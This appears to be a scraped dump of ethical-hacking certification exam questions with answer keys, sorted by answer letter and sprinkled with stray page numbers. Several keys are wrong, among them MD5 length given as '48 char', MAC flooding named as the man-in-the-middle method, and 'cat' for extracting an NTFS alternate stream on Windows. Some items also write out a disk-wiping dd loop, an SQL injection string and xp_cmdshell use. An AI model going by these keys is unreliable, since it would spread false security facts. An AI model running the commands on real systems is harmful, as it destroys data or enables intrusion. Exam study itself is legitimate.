C (Explanation: Tcpflow is a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump' shows a summary of packets seen on the wire, but usually doesn't store the data that's actually being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in a separate file for later analysis.)

3 Who is an Ethical Hacker? 2 A. A person who hacks for ethical reasons B. A person who hacks for an ethical cause C. A person who hacks for defensive purposes D. A person who hacks for offensive purposes

C (Explanation: The Ethical hacker is a security professional who applies his hacking skills for defensive purposes.)

100 Steve scans the network for SNMP enabled devices. Which port number Steve should scan? A. 69 B. 150 C. 161 D. 169

C (Explanation: The SNMP default port is 161. Port 69 is used for tftp, 150 is for SQL-NET and 169 is for SEND.)

412 In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? A. WEP attack B. Drive by hacking C. Rogue access point attack D. Unauthorized access point attack

C (Explanation: The definition of a Rogue access point is:1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company's network to the outside world.2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP picks up beacons (signals that advertise its presence) from the company's legitimate AP and transmits identical beacons, which some client machines inside the building associate with. 247)

1 What is the essential difference between an 'Ethical Hacker' and a 'Cracker'? A. The ethical hacker does not use the same techniques or skills as a cracker. B. The ethical hacker does it strictly for financial motives unlike a cracker. C. The ethical hacker has authorization from the owner of the target. D. The ethical hacker is just a cracker who is getting paid.

C (Explanation: The ethical hacker uses the same techniques and skills as a cracker and the motive is to find the security breaches before a cracker does. There is nothing that says that a cracker does not get paid for the work he does, a ethical hacker has the owners authorization and will get paid even if he does not succeed to penetrate the target.)

92 An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts. A. 2 B. 256 C. 512 D. Over 10,000

C (Explanation: The hosts with IP address 202.176.56.0-255 & 202.176.56.0-255 will be scanned (256+256=512))

401 Which of the following is NOT a reason 802.11 WEP encryption is vulnerable? A. There is no mutual authentication between wireless clients and access points B. Automated tools like AirSnort are available to discover WEP keys 241 C. The standard does not provide for centralized key management D. The 24 bit Initialization Vector (IV) field is too small

C (Explanation: The lack of centralized key management in itself is not a reason that the WEP encryption is vulnerable, it is the people setting the user shared key that makes it unsecure.)

350 What are the differences between SSL and S-HTTP? A. SSL operates at the network layer and S-HTTP operates at the application layer B. SSL operates at the application layer and S-HTTP operates at the network layer C. SSL operates at the transport layer and S-HTTP operates at the application layer D. SSL operates at the application layer and S-HTTP operates at the transport layer

C (Explanation: The main difference between the protocols is the layer at which they operate. SSL operates at the transport layer and mimics the "socket library," while S-HTTP operates at the application layer. Encryption of the transport layer allows SSL to be application-independent, while S-HTTP is limited to the specific software implementing it. The protocols adopt different philosophies towards encryption as well, with SSL encrypting the entire communications channel and S-HTTP encrypting each message independently.)

438 Joe the Hacker breaks into company's Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan horse in one of the network utilities. Joe is worried that network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode. Running "ifconfig -a" will produce the following: # ifconfig -a 1o0: flags=848<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232 inet 127.0.0.1 netmask ff000000hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST> mtu 1500 262 inet 192.0.2.99 netmask ffffff00 broadcast 134.5.2.255 ether 8:0:20:9c:a2:35 What can Joe do to hide the wiretap program from being detected by ifconfig command? A. Block output to the console whenever the user runs ifconfig command by running screen capture utiliyu B. Run the wiretap program in stealth mode from being detected by the ifconfig command. C. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console. D. You cannot disable Promiscuous mode detection on Linux systems.

C (Explanation: The normal way to hide these rogue programs running on systems is the use crafted commands like ifconfig and ls.)

147 You have the SOA presented below in your Zone. Your secondary servers have not been able to contact your primary server to synchronize information. How long will the secondary servers attempt to contact the primary server before it considers that zone is dead and stops responding to queries? collegae.edu.SOA,cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600) A. One day B. One hour C. One week D. One month

C (Explanation: The numbers represents the following values: 200302028; se = serial number 3600; ref = refresh = 1h 3600; ret = update retry = 1h 604800; ex = expiry = 1w 87 3600; min = minimum TTL = 1h)

40 Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company? A. To create a denial of service attack. B. To verify information about the mail administrator and his address. C. To gather information about internal hosts used in email treatment. D. To gather information about procedures that are in place to deal with such messages. 25

C (Explanation: The replay from the email server that states that there is no such recipient will also give you some information about the name of the email server, versions used and so on.)

310 What does the following command achieve? Telnet <IP Address> <Port 80> HEAD /HTTP/1.0 <Return> <Return> A. This command returns the home page for the IP address specified 186 B. This command opens a backdoor Telnet session to the IP address specified C. This command returns the banner of the website specified by IP address D. This command allows a hacker to determine the sites security E. This command is bogus and will accomplish nothing

C (Explanation: This command is used for banner grabbing. Banner grabbing helps identify the service and version of web server running.)

351 Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? A. Phishing B. Denial of Service C. Cross Site Scripting D. Backdoor installation 210

C (Explanation: This is a typical Type-1 Cross Site Scripting attack. This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.)

306 Jack Hacker wants to break into company's computers and obtain their secret double fudge cookie recipe. Jacks calls Jane, an accountant at company pretending to be an administrator from company. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss, and parts with her password. Jack can now access company's computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here? (Choose the best answer) A. Reverse Psychology B. Reverse Engineering C. Social Engineering D. Spoofing Identity E. Faking Identity

C (Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.)

19 How does Traceroute map the route that a packet travels from point A to point B? A. It uses a TCP Timestamp packet that will elicit a time exceed in transit message. B. It uses a protocol that will be rejected at the gateways on its way to its destination. C. It manipulates the value of time to live (TTL) parameter packet to elicit a time exceeded in transit message. D. It manipulated flags within packets to force gateways into generating error messages.

C (Explanation: Traceroute works by increasing the "time-to-live" value of each successive batch of packets sent. The first three packets have a time-to-live (TTL) value of one (implying that they make a single hop). The next three packets have a TTL value of 2, and so on. When a packet passes through a host, normally the host decrements the TTL value by one, and forwards the packet to the next host. When a packet with a TTL of one reaches a host, the host discards the packet and sends an ICMP time exceeded (type 11) packet to the sender. The traceroute utility uses these returning packets to produce a list of hosts that the packets have traversed en route to the destination.)

37 While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for all the pings sent out. What is the most likely cause behind this response? 23 A. The firewall is dropping the packets. B. An in-line IDS is dropping the packets. C. A router is blocking ICMP. D. The host does not respond to ICMP packets.

C (Explanation: Type 3 message = Destination Unreachable [RFC792], Code 13 (cause) = Communication Administratively Prohibited [RFC1812])

437 Windump is the windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library? A. NTPCAP B. LibPCAP C. WinPCAP D. PCAP

C (Explanation: WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.)

234 You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS 140 streaming. Which command would you execute to extract the Trojan to a standalone file? A. c:\> type readme.txt:virus.exe > virus.exe B. c:\> more readme.txt | virus.exe > virus.exe C. c:\> cat readme.txt:virus.exe > virus.exe D. c:\> list redme.txt$virus.exe > virus.exe

C (Explanation: cat will concatenate, or write, the alternate data stream to its own file named virus.exe)

225 John Beetlesman, the hacker has successfully compromised the Linux System of Agent Telecommunications, Inc's WebServer running Apache. He has downloaded sensitive documents and database files off the machine. Upon performing various tasks, Beetlesman finally runs the following command on the Linux box before disconnecting. for ((i=0;i<1;i++));do ?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done What exactly is John trying to do? A. He is making a bit stream copy of the entire hard disk for later download B. He is deleting log files to remove his trace C. He is wiping the contents of the hard disk with zeros D. He is infecting the hard disk with random virus strings

C (Explanation: dd copies an input file to an output file with optional conversions. -if is input file, -of is output file. /dev/zero is a special file that provides as many null characters (ASCII NULL, 0x00; not ASCII character "digit zero", "0", 0x30) as are read from it. /dev/hda is the hard drive. 135)

211 LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in Windows XP? A. Stop the LM service in Windows XP B. Disable LSASS service in Windows XP C. Disable LM authentication in the registry D. Download and install LMSHUT.EXE tool from Microsoft website

C (Explanation: http://support.microsoft.com/kb/299656)

456 Jim's Organization just completed a major Linux roll out and now all of the organization's systems are running Linux 2.5 Kernel. The roll out expenses has posed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ, which built-in functionality of Linux can achieve this? A. IP ICMP B. IP Sniffer C. IP tables D. IP Chains

C (Explanation: iptables is the name of the user space tool by which administrators create rules for the packet filtering and NAT modules. While technically iptables is merely the tool which controls the packet filtering and NAT components within the kernel, the name iptables is often used to refer to the entire infrastructure, including netfilter, connection tracking and NAT, as well as the tool itself. iptables is a standard part of all modern Linux distributions.)

275 The evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is attempting to perform? A. Syn flood B. Smurf C. Ping of death D. Fraggle

C (Reference: http://insecure.org/sploits/ping-o-death.html)

180 Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored? (Choose the best answer) A. symmetric algorithms B. asymmetric algorithms C. hashing algorithms D. integrity algorithms

C 108 (Explanation: In cryptography, a cryptographic hash function is a hash function with certain additional security properties to make it suitable for use as a primitive in various information security applications, such as authentication and message integrity. A hash function takes a long string (or 'message') of any length as input and produces a fixed length string as output, sometimes termed a message digest or a digital fingerprint.)

204 In the context of Windows Security, what is a 'null' user? A. A user that has no skills B. An account that has been suspended by the admin C. A pseudo account that has no username and password D. A pseudo account that was created for security administration purpose

C 121 (Explanation: NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol that exist primarily for trust relationships. You can establish a NULL session with a Windows host by logging on with a NULL user name and password. Using these NULL connections allows you to gather the following information from the host:* List of users and groups * List of machines * List of shares * Users and host SID' (Security Identifiers) NULL sessions exist in windows networking to allow: * Trusted domains to enumerate resources * Computers outside the domain to authenticate and enumerate users * The SYSTEM account to authenticate and enumerate resources NetBIOS NULL sessions are enabled by default in Windows NT and 2000. Windows XP and 2003 will allow anonymous enumeration of shares, but not SAM accounts.)

394 Bank of Timbukut is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web Application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a web browser. John Stevens is in charge of information security at Bank of Timbukut. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed ! However, money hasn't been removed from the bank, instead money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web Application's logs and found the following entries. What kind of attack did the Hacker attempt to carry out at the Bank? A. Brute Force attack in which the Hacker attempted guessing login ID and password from password cracking tools B. The Hacker used a generator module to pass results to the Web Server and exploited Web Application CGI vulnerability. C. The Hacker first attempted logins with suspected user names, then used SQL injection to gain access to valid login IDs D. The Hacker attempted Session Hijacking, in which the hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.

C 237 (Explanation: Typing things like ' or 1=1 - in the login field is evidence of a hacker trying out if the system is vulnerable to SQL injection. Topic 15, Hacking Wireless Networks)

605 If a competitor wants to cause damage to your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they will be in the organization. How would you prevent such type of attacks? A. It is impossible to block these attacks B. Hire the people through third-party job agencies who will vet them for you C. Conduct thorough background checks before you engage them D. Investigate their social networking profiles

C 366

7 Which of the following programs is usually targeted at Microsoft Office products? A. Polymorphic virus B. Multipart virus C. Macro virus D. Stealth virus

C (Explanation: A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spreaD. References: https://en.wikipedia.org/wiki/Macro_virus)

9 In order to show improvement of security over time, what must be developed? A. Reports B. Testing tools C. Metrics D. Taxonomy of vulnerabilities

C (Explanation: Today, management demands metrics to get a clearer view of security. Metrics that measure participation, effectiveness, and window of exposure, however, offer information the organization can use to make plans and improve programs. References: http://www.infoworld.com/article/2974642/security/4-security-metrics-that-matter.html Topic 2, Analysis/Assessment)

760 Which of the following Exclusive OR transforms bits is NOT correct? A. 0 xor 0 = 0 B. 1 xor 0 = 1 C. 1 xor 1 = 1 D. 0 xor 1 = 1

C ( 1 xor 1 = 1)

730 You generate MD5 128-bit hash on all files and folders on your computer to keep a baseline check for security reasons? What is the length of the MD5 hash? A. 32 bit B. 64 byte C. 48 char D. 128 kb

C ( 48 char)

731 Which type of password cracking technique works like dictionary attack but adds some numbers and symbols to the words from the dictionary and tries to crack the password? A. Dictionary attack B. Brute forcing attack C. Hybrid attack D. Syllable attack E. Rule-based attack

C ( Hybrid attack)

717 Which type of sniffing technique is generally referred as MiTM attack? 433 A. Password Sniffing B. ARP Poisoning C. Mac Flooding D. DHCP Sniffing

C ( Mac Flooding)

746 Lauren is performing a network audit for her entire company. The entire network is comprised of around 500 computers. Lauren starts an ICMP ping sweep by sending one IP packet to the broadcast address of the network, but only receives responses from around five hosts. Why did this ping sweep only produce a few responses? A. Only Windows systems will reply to this scan. B. A switched network will not respond to packets sent to the broadcast address. C. Only Linux and Unix-like (Non-Windows) systems will reply to this scan. D. Only servers will reply to this scan.

C ( Only Linux and Unix-like (Non-Windows) systems will reply to this scan.)

709 This TCP flag instructs the sending system to transmit all buffered data immediately. A. SYN B. RST C. PSH D. URG E. FIN

C ( PSH)

733 What do you call a pre-computed hash? A. Sun tables B. Apple tables C. Rainbow tables D. Moon tables

C ( Rainbow tables)

744 The GET method should never be used when sensitive data such as credit card is being sent to a CGI program. This is because any GET command will appear in the URL, and will be logged by any servers. For example, let's say that you've entered your credit card information into a form that uses the GET method. The URL may appear like this: https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234 The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information. How would you protect from this type of attack? A. Never include sensitive information in a script B. Use HTTPS SSLv3 to send the data instead of plain HTTPS C. Replace the GET with POST method when sending data D. Encrypt the data before you send using GET method

C ( Replace the GET with POST method when sending data)

715 You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free Anti-Virus software. Dear valued customers, We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware, viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code: Antivirus code: 5014 http://www.juggyboy/virus/virus.html Thank you for choosing us, the worldwide leader Antivirus solutions. Mike Robertson PDF Reader Support Copyright Antivirus 2010 ?All rights reserved If you want to stop receiving mail, please go to: http://www.juggyboy.com or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta 431 Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama How will you determine if this is Real Anti-Virus or Fake Anti-Virus website? A. Look at the website design, if it looks professional then it is a Real Anti-Virus website B. Connect to the site using SSL, if you are successful then the website is genuine C. Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site D. Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will 432 prompt you and stop the installation if the downloaded file is a malware E. Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a malware

C ( Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site)

740 If an attacker's computer sends an IPID of 24333 to a zombie (Idle Scanning) computer on a closed port, what will be the response? A. The zombie computer will respond with an IPID of 24334. B. The zombie computer will respond with an IPID of 24333. C. The zombie computer will not send a response. D. The zombie computer will respond with an IPID of 24335.

C ( The zombie computer will not send a response.)

728 NTP allows you to set the clocks on your systems very accurately, to within 100ms and sometimes-even 10ms. Knowing the exact time is extremely important for enterprise security. Various security protocols depend on an accurate source of time information in order to prevent "playback" attacks. These protocols tag their ommunications with the current time, to prevent attackers from replaying the same communications, e.g., a login/password interaction or even an entire communication, at a later date. One can circumvent this tagging, if the clock can be set back to the time the communication was recorded. An attacker attempts to try corrupting the clocks on devices on your network. You run Wireshark to detect the NTP traffic to see if there are any irregularities on the network. What port number you should enable in Wireshark display filter to view NTP packets? A. TCP Port 124 B. UDP Port 125 C. UDP Port 123 D. TCP Port 126

C ( UDP Port 123)

710 You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion? A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account B. Package the Sales.xls using Trojan wrappers and telnet them back your home computer C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques D. Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account

C ( You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques)

754 You want to perform advanced SQL Injection attack against a vulnerable website. You are unable to perform command shell hacks on this server. What must be enabled in SQL Server to launch these attacks? A. System services B. EXEC master access C. xp_cmdshell D. RDC

C ( xp_cmdshell)

732 What command would you type to OS fingerprint a server using the command line? A. Option A B. Option B C. Option C D. Option D

C)

755 Kevin is an IT security analyst working for Emerson Time Makers, a watch manufacturing company in Miami. Kevin and his girlfriend Katy recently broke up after a big fight. Kevin believes that she was seeing another person. Kevin, who has an online email account that he uses for most of his mail, knows that Katy has an account with that same company. Kevin logs into his email account online and gets the following URL after successfully logged in: http://www.youremailhere.com/mail.asp?mailbox=Kevin&Smith=121%22 Kevin changes the URL to: http://www.youremailhere.com/mail.asp?mailbox=Katy&Sanchez=121%22 Kevin is trying to access her email account to see if he can find out any information. What is Kevin attempting here to gain access to Katy's mailbox? A. This type of attempt is called URL obfuscation when someone manually changes a URL to try and gain unauthorized access B. By changing the mailbox's name in the URL, Kevin is attempting directory transversal C. Kevin is trying to utilize query string manipulation to gain access to her email account D. He is attempting a path-string attack to gain access to her mailbox

C)

62 What are the default passwords used by SNMP?(Choose two.) 38 A. Password B. SA C. Private D. Administrator E. Public F. Blank

C,E (Explanation: Besides the fact that it passes information in clear text, SNMP also uses wellknown passwords. Public and private are the default passwords used by SNMP.)

110 Which of the statements concerning proxy firewalls is correct? A. Proxy firewalls increase the speed and functionality of a network. B. Firewall proxy servers decentralize all activity for an application. C. Proxy firewalls block network packets from passing to and from a protected network. D. Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

D

117 Which command line switch would be used in NMAP to perform operating system detection? A. -OS B. -sO C. -sP D. -O

D

123 How can a rootkit bypass Windows 7 operating system's kernel mode, code signing policy? A. Defeating the scanner from detecting any code change at the kernel B. Replacing patch system calls with its own version that hides the rootkit (attacker's) actions C. Performing common services for the application process and replacing real applications with fake ones D. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options

D

13 An NMAP scan of a server shows port 25 is open. What risk could this pose? A. Open printer sharing B. Web portal data leak C. Clear text authentication D. Active mail relay

D

136 Which of the following problems can be solved by using Wireshark? A. Tracking version changes of source code B. Checking creation dates on all webpages on a server C. Resetting the administrator password on multiple systems D. Troubleshooting communication resets between two systems

D

137 What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25? A. tcp.src == 25 and ip.host == 192.168.0.125 B. host 192.168.0.125:25 C. port 25 and host 192.168.0.125 D. tcp.port == 25 and ip.host == 192.168.0.125

D

139 Which of the following is an example of two factor authentication? A. PIN Number and Birth Date B. Username and Password C. Digital Certificate and Hardware Token D. Fingerprint and Smartcard ID

D

14 A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System (OS) version installeD. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:89 A. The host is likely a Windows machine B. The host is likely a Linux machine C. The host is likely a router. D. The host is likely a printer.

D

142 What statement is true regarding LM hashes? A. LM hashes consist in 48 hexadecimal characters. B. LM hashes are based on AES128 cryptographic standard C. Uppercase characters in the password are converted to lowercase D. LM hashes are not generated when the password length exceeds 15 characters.

D

143 A developer for a company is tasked with creating a program that will allow customers to update their billing and shipping information. The billing address field used is limited to 50 characters. What pseudo code would the developer use to avoid a buffer overflow attack on the billing address field? A. if (billingAddress = 50) {update field} else exit B. if (billingAddress != 50) {update field} else exit C. if (billingAddress >= 50) {update field} else exit D. if (billingAddress <= 50) {update field} else exit

D

147 Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows tools? A. ping 192.168.2. B. ping 192.168.2.255 C. for %V in (1 1 255) do PING 192.168.2.%V D. for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

D

148 What results will the following command yield: 'NMAP -sS -O -p 123-153 192.168.100.3'? A. A stealth scan, opening port 123 and 153 B. A stealth scan, checking open ports 123 to 153 C. A stealth scan, checking all open ports excluding ports 123 to 153 D. A stealth scan, determine operating system, and scanning ports 123 to 153

D

149 Which of the following parameters enables NMAP's operating system detection feature? A. NMAP -sV B. NMAP -oS C. NMAP -sR D. NMAP -O

D

153 Which of the following settings enables Nessus to detect when it is sending too many packets and the network pipe is approaching capacity? A. Netstat WMI Scan B. Silent Dependencies C. Consider unscanned ports as closed D. Reduce parallel connections on congestion

D

155 Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run? A. Cavity virus B. Polymorphic virus C. Tunneling virus D. Stealth virus

D

166 What is the main disadvantage of the scripting languages as opposed to compiled programming languages? A. Scripting languages are hard to learn. B. Scripting languages are not object-oriented C. Scripting languages cannot be used to create graphical user interfaces. D. Scripting languages are slower because they require an interpreter to run the code

D

169 What is a successful method for protecting a router from potential smurf attacks? A. Placing the router in broadcast mode B. Enabling port forwarding on the router C. Installing the router outside of the network's firewall D. Disabling the router from accepting broadcast ping messages

D

17 A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement states that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed? A. white box B. 11 grey box C. red box D. black box

D

172 The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric key cryptography uses which of the following? A. Multiple keys for non-repudiation of bulk data B. Different keys on both ends of the transport medium C. Bulk encryption for data transmission over fiber D. The same key on each end of the transmission medium

D

173 An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. The attacker can now use which cryptanalytic technique to attempt to discover the encryption key? A. Birthday attack B. Plaintext attack C. Meet in the middle attack D. Chosen ciphertext attack

D

174 What is the primary drawback to using advanced encryption standard (AES) algorithm with a 256 bit key to share sensitive data? A. Due to the key size, the time it will take to encrypt and decrypt the message hinders efficient communication. B. To get messaging programs to function with this algorithm requires complex configurations. C. It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data D. It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel than the messagE.

D

177 An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks below is likely to be used to crack the target file? A. Timing attack B. Replay attack C. Memory trade-off attack D. Chosen plain-text attack

D

179 Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations? A. Key registry B. Recovery agent C. Directory D. Key escrow

D

181 Which of the following is a common Service Oriented Architecture (SOA) vulnerability? A. Cross-site scripting B. SQL injection C. VPath injection D. XML denial of service issues

D

187 Which of the following descriptions is true about a static NAT? A. A static NAT uses a many-to-many mapping. B. A static NAT uses a one-to-many mapping. C. A static NAT uses a many-to-one mapping. D. A static NAT uses a one-to-one mapping.

D

196 Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an appropriate method? A. It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained. B. If a user forgets the password, it can be easily retrieved using the hash key stored by administrators. C. Hashing is faster compared to more traditional encryption algorithms. D. Passwords stored using hashes are non-reversible, making finding the password much more difficult.

D

205 If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry point that was used during the application development, what is this secret entry point known as? A. SDLC process B. Honey pot C. SQL injection D. Trap door

D

209 When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is A. OWASP is for web applications and OSSTMM does not include web applications. B. OSSTMM is gray box testing and OWASP is black box testing. C. OWASP addresses controls and OSSTMM does not. D. OSSTMM addresses controls and OWASP does not.

D

211 What are the three types of compliance that the Open Source Security Testing Methodology Manual (OSSTMM) recognizes? A. Legal, performance, audit B. Audit, standards based, regulatory C. Contractual, regulatory, industry D. Legislative, contractual, standards based

D

217 How do employers protect assets with security policies pertaining to employee surveillance activities? A. Employers promote monitoring activities of employees as long as the employees demonstrate trustworthiness. B. Employers use informal verbal communication channels to explain employee monitoring activities to employees. C. Employers use network surveillance to monitor employee email traffic, network access, and to record employee keystrokes. D. Employers provide employees written statements that clearly discuss the boundaries of monitoring activities and consequences.

D

224 Which of the following guidelines or standards is associated with the credit card industry? A. Control Objectives for Information and Related Technology (COBIT) B. Sarbanes-Oxley Act (SOX) C. Health Insurance Portability and Accountability Act (HIPAA) D. Payment Card Industry Data Security Standards (PCI DSS)

D

231 A computer technician is using a new version of a word processing software package when it is discovered that a special sequence of characters causes the entire computer to crash. The technician researches the bug and discovers that no one else experienced the problem. What is the appropriate next step? A. Ignore the problem completely and let someone else deal with it. B. Create a document that will crash the computer when opened and send it to friends. C. Find an underground bulletin board and attempt to sell the bug to the highest bidder. D. Notify the vendor of the bug and do not disclose it until the vendor gets a chance to issue a fix.

D

24 A penetration tester was hired to perform a penetration test for a bank. The tester began searching for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online about the bank, watching what times the bank employees come into work and leave from work, searching the bank's job postings (paying special attention to IT related jobs), and visiting the local dumpster for the bank's corporate office. What phase of the penetration test is the tester currently in? A. Information reporting B. Vulnerability assessment C. Active information gathering D. Passive information gathering

D

25 The following is part of a log file taken from the machine on the network with the IP address of 192.168.1.106: Time:Mar 13 17:30:15 Port:20 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:17 Port:21 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:19 Port:22 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:21 Port:23 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:22 Port:25 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:23 Port:80 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:30 Port:443 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP What type of activity has been logged? A. Port scan targeting 192.168.1.103 B. Teardrop attack targeting 192.168.1.106 C. Denial of service attack targeting 192.168.1.103 D. Port scan targeting 192.168.1.106

D

35 John the Ripper is a technical assessment tool used to test the weakness of which of the following? A. Usernames B. File permissions C. Firewall rulesets D. Passwords

D

366 Eve stole a file named secret.txt, transferred it to her computer and she just entered these commands: [eve@localhost ~]$ john secret.txt Loaded 2 password hashes with no different salts (LM [DES 128/128 SSE2-16]) Press 'q' or Ctrl-C to abort. almost any other key for status 0g 0:00:00:03 3/3 0g/s 86168p/s 86168c/s 172336C/s MERO..SAMPLUI 0g 0:00:00:04 3/3 0g/s 3296Kp/s 3296Kc/s 6592KC/s GOS..KARIS4 0g 0:00:00:07 3/3 0g/s 8154Kp/s 8154Kc/s 16309KC/s NY180K..NY1837 0g 0:00:00:10 3/3 0g/s 7958Kp/s 7958Kc/s 1591KC/s SHAGRN..SHENY9 What is she trying to achieve? A. She is encrypting the file. B. She is using John the Ripper to view the contents of the file C. She is using ftp to transfer the file to another hacker named John. D. She is using John the Ripper to crack the passwords in the secret.txt file

D

369 Which tier in the N-tier application architecture is responsible for moving and processing data between the tiers? A. Application Layer B. Data tier C. Presentation tier D. Logic tier

D

379 Sophia travels a lot and worries that her laptop containing confidential documents might be stolen. What is the best protection that will work for her? A. Password protected files B. Hidden folders C. BIOS password D. Full disk encryption.

D

38 What is one thing a tester can do to ensure that the software is trusted and is not changing or tampering with critical data on the back end of a system it is loaded on? A. Proper testing B. Secure coding principles C. Systems security and architecture review D. Analysis of interrupts within the software

D

